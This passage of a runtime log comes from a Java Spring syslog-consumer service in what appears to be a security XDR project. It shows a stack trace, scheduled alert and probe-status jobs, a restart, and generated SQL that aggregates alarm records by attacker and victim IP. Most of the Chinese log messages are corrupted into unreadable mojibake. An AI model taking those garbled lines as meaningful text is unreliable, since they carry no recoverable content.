at java.util.Formatter$FormatSpecifier.failConversion(Formatter.java:4302)
at java.util.Formatter$FormatSpecifier.printInteger(Formatter.java:2793)
at java.util.Formatter$FormatSpecifier.print(Formatter.java:2747)
at java.util.Formatter.format(Formatter.java:2520)
at java.util.Formatter.format(Formatter.java:2455)
at java.lang.String.format(String.java:2940)
at com.common.service.AlarmHealthCheckService.generateAlarmNotification(AlarmHealthCheckService.java:119)
at com.common.service.AlarmHealthCheckService.performHealthCheck(AlarmHealthCheckService.java:48)
at com.common.schedule.AlarmHealthCheckScheduler.scheduledHealthCheck(AlarmHealthCheckScheduler.java:32)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.scheduling.support.ScheduledMethodRunnable.run(ScheduledMethodRunnable.java:84)
at org.springframework.scheduling.support.DelegatingErrorHandlingRunnable.run(DelegatingErrorHandlingRunnable.java:54)
at org.springframework.scheduling.concurrent.ReschedulingRunnable.run(ReschedulingRunnable.java:95)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:293)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
2026-05-19 12:31:46.156 [scheduling-2] INFO c.c.s.AlarmHealthCheckScheduler - ========== ==========
2026-05-19 12:31:46.434 [log-processor-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:31:46.472 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 12:31:46.580 [scheduling-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:31:46.618 [scheduling-3] INFO c.c.s.RealtimeAnalysisScheduler - ִй: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, nextTime=2026-05-19T12:08, now=2026-05-19T12:31:44.951
2026-05-19 12:31:46.618 [scheduling-3] INFO c.c.s.impl.AnalysisRuleServiceImpl - ִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 12:31:46.633 [scheduling-10] INFO c.c.service.WecomNotificationService - ΢֪ͨɹ, ID: 85, : probe_offline, : ̽-1
2026-05-19 12:31:46.633 [scheduling-10] WARN c.c.service.WecomNotificationService - ΢Ÿ澯֪ͨ - : ̽-1, : probe_offline, ȼ: 4, : ̽߸澯
̽ID: 1
̽: ????????-01
̽IP: 192.168.0.124
汾: V1.0.0-20260509
ʱ: 2026-05-19 12:31:46
: 2026-05-19 12:07:37
: ̽Ƿ
2026-05-19 12:31:46.633 [scheduling-10] INFO c.c.service.ProbeHeartbeatService - ̽߸澯ɹ, ֪ͨID: 85
2026-05-19 12:31:46.634 [scheduling-10] WARN c.c.service.ProbeHeartbeatService - ̽ 1 ߣʱ: 2026-05-19T12:07:37.703
2026-05-19 12:31:46.648 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ1ʱ176ms
2026-05-19 12:31:46.649 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T12:31:46.649
2026-05-19 12:31:46.649 [scheduling-5] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T12:31:46.649
2026-05-19 12:31:46.692 [HikariPool-SyslogConsumer housekeeper] WARN com.zaxxer.hikari.pool.HikariPool - HikariPool-SyslogConsumer - Thread starvation or clock leap detected (housekeeper delta=24m15s532ms337?s600ns).
2026-05-19 12:31:46.712 [scheduling-10] WARN c.c.s.ProbeStatusCheckScheduler - ̽״̬ɣ 1 ̽, ֵ: 10, ʱ: 1760ms
2026-05-19 12:31:46.712 [scheduling-10] WARN c.c.s.ProbeStatusCheckScheduler - ̽: collectId=1, ip=192.168.0.124, name=????????-01
2026-05-19 12:31:47.055 [scheduling-10] INFO c.c.s.ProbeStatusCheckScheduler - ̽ͳ: =1, =0, =1
2026-05-19 12:31:47.055 [scheduling-10] INFO c.c.s.ProbeStatusCheckScheduler - ========== ̽״̬ ==========
2026-05-19 12:31:47.103 [scheduling-5] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 12:31:47.103 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 454ms
2026-05-19 12:31:47.295 [scheduling-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:31:47.319 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 0 м¼
2026-05-19 12:31:47.319 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 12:31:47.319 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ0
2026-05-19 12:31:47.360 [scheduling-3] INFO c.c.s.impl.RealtimeAnalysisEngine - ڲѯΧ: ڴС=10mѯʱ䷶Χ=[2026-05-19 12:21:00, 2026-05-19 12:31:00]
2026-05-19 12:31:47.360 [scheduling-3] INFO c.c.s.impl.RealtimeAnalysisEngine - ʼִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, batchNo=20260519123146960, windowType=tumble, dataStartTime=2026-05-19 12:21:00, dataEndTime=2026-05-19 12:31:00
2026-05-19 12:31:47.471 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 12:31:47.471 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 12:31:47.471 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹0ʱ2519ms
2026-05-19 12:31:48.595 [scheduling-3] INFO c.c.s.impl.RealtimeAnalysisEngine - ɵSQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 12:21:00' AND log_time < '2026-05-19 12:31:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 12:31:49.069 [scheduling-3] INFO c.c.s.impl.RealtimeAnalysisEngine - ִгɹ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 12:31:49.648 [scheduling-3] INFO c.c.s.i.RuleExecutionTimeServiceImpl - ¹´ִʱ䣬ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, windowType=tumble, nextExecuteTime=2026-05-19 12:41:00
2026-05-19 12:31:49.648 [scheduling-3] INFO c.c.s.RealtimeAnalysisScheduler - εִй: 1, : 0
2026-05-19 12:31:49.748 [http-nio-8089-exec-5] INFO c.c.service.WecomNotificationService - ΢֪ͨɹ, ID: 86, : probe_recovery, : ָ̽-1
2026-05-19 12:31:49.748 [http-nio-8089-exec-5] WARN c.c.service.WecomNotificationService - ΢Ÿ澯֪ͨ - : ָ̽-1, : probe_recovery, ȼ: 1, : ָ֪̽ͨ
̽ID: 1
̽: ????????-01
̽IP: 192.168.0.124
ָʱ: 2026-05-19 12:31:49
״̬: ѻָ
2026-05-19 12:31:49.748 [http-nio-8089-exec-5] INFO c.c.service.ProbeHeartbeatService - ָ֪̽ͨɹ, ֪ͨID: 86
2026-05-19 12:31:49.748 [http-nio-8089-exec-5] INFO c.c.service.ProbeHeartbeatService - ̽ 1 ѻָ
2026-05-19 12:32:00.002 [scheduling-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:32:00.005 [log-processor-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:32:00.229 [scheduling-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:32:00.247 [log-processor-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:32:00.480 [log-processor-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:32:00.481 [scheduling-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:33:00.000 [scheduling-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:33:00.004 [log-processor-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:33:00.235 [log-processor-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:33:00.235 [scheduling-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:33:00.494 [scheduling-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:33:00.503 [log-processor-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:34:00.003 [scheduling-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:34:00.003 [log-processor-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:34:00.224 [scheduling-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:34:00.224 [log-processor-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:34:00.484 [log-processor-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:34:00.488 [scheduling-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:35:00.003 [scheduling-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:35:00.003 [log-processor-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:35:00.077 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 12:35:00.222 [scheduling-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:35:00.226 [log-processor-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:35:00.233 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ1ʱ156ms
2026-05-19 12:35:00.233 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T12:35:00.233
2026-05-19 12:35:00.233 [scheduling-1] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T12:35:00.233
2026-05-19 12:35:00.485 [scheduling-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:35:00.663 [scheduling-1] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 12:35:00.663 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 430ms
2026-05-19 12:35:00.849 [log-processor-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:36:00.012 [scheduling-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:36:00.012 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T12:36:00.012
2026-05-19 12:36:00.012 [log-processor-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:36:00.236 [log-processor-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:36:00.236 [scheduling-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:36:00.470 [scheduling-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:36:00.519 [log-processor-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:36:00.699 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 0 м¼
2026-05-19 12:36:00.699 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 12:36:00.699 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ0
2026-05-19 12:36:00.849 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 12:36:00.849 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 12:36:00.849 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹0ʱ837ms
2026-05-19 12:37:00.013 [scheduling-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:37:00.013 [log-processor-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:37:00.234 [log-processor-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:37:00.234 [scheduling-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:37:00.234 [log-processor-6] WARN c.c.service.AccessLogAlertService - ûõãδ
2026-05-19 12:37:00.491 [scheduling-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:38:00.015 [scheduling-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:38:00.015 [log-processor-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:38:00.234 [scheduling-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:38:00.233 [log-processor-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:38:00.563 [log-processor-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:38:00.563 [scheduling-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:39:00.015 [scheduling-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:39:00.015 [log-processor-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:39:00.236 [scheduling-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:39:00.236 [log-processor-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:39:00.535 [log-processor-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:39:00.859 [scheduling-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:40:00.004 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ========== ʼ̽״̬ ==========
2026-05-19 12:40:00.004 [scheduling-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:40:00.004 [log-processor-9] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:40:00.078 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 12:40:00.227 [scheduling-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:40:00.227 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ̽״̬ɣ̽, ʱ: 223ms
2026-05-19 12:40:00.227 [log-processor-9] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:40:00.233 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ1ʱ155ms
2026-05-19 12:40:00.233 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T12:40:00.233
2026-05-19 12:40:00.233 [scheduling-6] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T12:40:00.233
2026-05-19 12:40:00.378 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ̽ͳ: =1, =1, =0
2026-05-19 12:40:00.378 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ========== ̽״̬ ==========
2026-05-19 12:40:00.473 [scheduling-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:40:00.475 [log-processor-9] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:40:00.664 [scheduling-6] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 12:40:00.664 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 431ms
2026-05-19 12:40:55.056 [main] INFO com.syslogApplication - Starting syslogApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 35676 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
2026-05-19 12:40:55.059 [main] INFO com.syslogApplication - No active profile set, falling back to 1 default profile: "default"
2026-05-19 12:40:55.062 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
2026-05-19 12:40:57.067 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:40:57.068 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
2026-05-19 12:40:57.544 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 470 ms. Found 1 Elasticsearch repository interfaces.
2026-05-19 12:40:57.549 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:40:57.551 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
2026-05-19 12:40:57.677 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
2026-05-19 12:40:57.678 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 126 ms. Found 0 Reactive Elasticsearch repository interfaces.
2026-05-19 12:40:57.691 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:40:57.692 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
2026-05-19 12:40:57.809 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
2026-05-19 12:40:57.809 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 108 ms. Found 0 Redis repository interfaces.
2026-05-19 12:40:58.413 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8089 (http)
2026-05-19 12:40:58.421 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8089"]
2026-05-19 12:40:58.421 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
2026-05-19 12:40:58.421 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
2026-05-19 12:40:58.589 [main] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring embedded WebApplicationContext
2026-05-19 12:40:58.590 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 3465 ms
2026-05-19 12:40:58.640 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogApplication.dmColumnService
2026-05-19 12:41:01.774 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 12:41:02.162 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
2026-05-19 12:41:02.177 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
2026-05-19 12:41:02.196 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
2026-05-19 12:41:02.199 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
2026-05-19 12:41:02.250 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
2026-05-19 12:41:09.484 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== ʼʵʱ ==========
2026-05-19 12:41:09.505 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Starting...
2026-05-19 12:41:10.174 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Start completed.
2026-05-19 12:41:10.361 [main] INFO c.c.s.RealtimeAnalysisScheduler - ѯ 1 ʵʱ
2026-05-19 12:41:16.844 [main] INFO c.c.s.i.RuleExecutionTimeServiceImpl - ִʱѴڣʼruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 12:41:16.845 [main] INFO c.c.s.RealtimeAnalysisScheduler - ʼ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, windowType=tumble
2026-05-19 12:41:16.845 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== ʵʱʼ ==========
2026-05-19 12:41:16.854 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: public static com.common.service.DeviceDeviceService com.common.service.AccessLogAlertService.deviceDeviceService
2026-05-19 12:41:16.894 [main] INFO c.c.service.AccessLogAlertService - ʼAccessLogAlertServiceϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:41:17.122 [main] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:41:17.780 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 12:41:17.984 [main] INFO com.common.util.MyBatisUtil - MyBatis ʼɹ
2026-05-19 12:41:18.939 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
2026-05-19 12:41:18.954 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
2026-05-19 12:41:18.954 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
2026-05-19 12:41:18.955 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
2026-05-19 12:41:18.956 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
NOT STARTED.
Currently in standby mode.
Number of jobs executed: 0
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
2026-05-19 12:41:18.956 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
2026-05-19 12:41:18.956 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
2026-05-19 12:41:18.956 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@2f42f20f
2026-05-19 12:41:19.200 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 12:41:19.200 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 12:41:19.200 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779165679197
2026-05-19 12:41:19.224 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 12:41:19.224 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 12:41:19.224 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779165679223
2026-05-19 12:41:19.226 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8089"]
2026-05-19 12:41:19.243 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8089 (http) with context path '/xdrservice'
2026-05-19 12:41:19.245 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
2026-05-19 12:41:19.245 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
2026-05-19 12:41:19.267 [main] INFO com.syslogApplication - Started syslogApplication in 24.651 seconds (JVM running for 28.815)
2026-05-19 12:41:19.511 [scheduling-2] INFO c.c.s.RealtimeAnalysisScheduler - ִй: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, nextTime=2026-05-19T12:41, now=2026-05-19T12:41:19.263
2026-05-19 12:41:19.511 [scheduling-2] INFO c.c.s.impl.AnalysisRuleServiceImpl - ִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 12:41:19.736 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: []
2026-05-19 12:41:19.763 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: [test-topic-0]
2026-05-19 12:41:19.774 [http-nio-8089-exec-1] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring DispatcherServlet 'dispatcherServlet'
2026-05-19 12:41:19.775 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Initializing Servlet 'dispatcherServlet'
2026-05-19 12:41:19.778 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Completed initialization in 3 ms
2026-05-19 12:41:19.982 [scheduling-2] INFO c.c.s.impl.RealtimeAnalysisEngine - ڲѯΧ: ڴС=10mѯʱ䷶Χ=[2026-05-19 12:31:00, 2026-05-19 12:41:00]
2026-05-19 12:41:19.982 [scheduling-2] INFO c.c.s.impl.RealtimeAnalysisEngine - ʼִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, batchNo=20260519124119668, windowType=tumble, dataStartTime=2026-05-19 12:31:00, dataEndTime=2026-05-19 12:41:00
2026-05-19 12:41:21.251 [scheduling-2] INFO c.c.s.impl.RealtimeAnalysisEngine - ɵSQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
